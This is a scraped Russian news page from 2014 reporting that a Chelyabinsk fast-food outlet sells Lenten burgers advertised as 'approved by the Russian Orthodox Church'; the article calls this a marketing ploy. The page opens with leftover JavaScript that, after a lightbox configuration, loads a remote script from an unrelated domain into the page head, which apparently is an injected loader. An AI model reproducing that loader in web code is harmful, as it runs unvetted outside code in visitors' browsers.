, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })

В одном из челябинских фаст-фудов готовят бургеры, «одобренные церковью»

В одном из ресторанов быстрого питания областной столицы посетителям предлагают специальное постное меню. В нем челябинцам, соблюдающим Великий пост, предлагают специальные бургеры для верующих. В меню даже написано, что продукция «одобрена русской православной церковью».

В заведении пояснили, что постные бургеры содержат гораздо больше овощей, чем обычно. В стандартной булке котлета из курицы заменена на рыбу с баклажаны и кукурузой. Каким именно образом было получено одобрение священнослужителей, в заведении не сообщили.

Отметим, что в дни Великого поста запрещено употреблять в пишу алкоголь, мясо, молоко, яица, конфеты, майонез и выпечку. Рыбу можно кушать только в определенные дни, 7 и 13 апреля, а вот белый хлеб, из которого изготавливаю булки для бургеров, употреблять нельзя. Так что, судя по всему, постное меню фаст-фуда - это не более, чем рекламный ход.

Новости
0 rating, 0 votes0 rating, 0 votes Запрещено!
Loading...Loading...
0:53 - 05 апреля 2014
|
автор: U-RSS
|
(909)
|
(0)

Комментарии (0)

Я человек
Я бот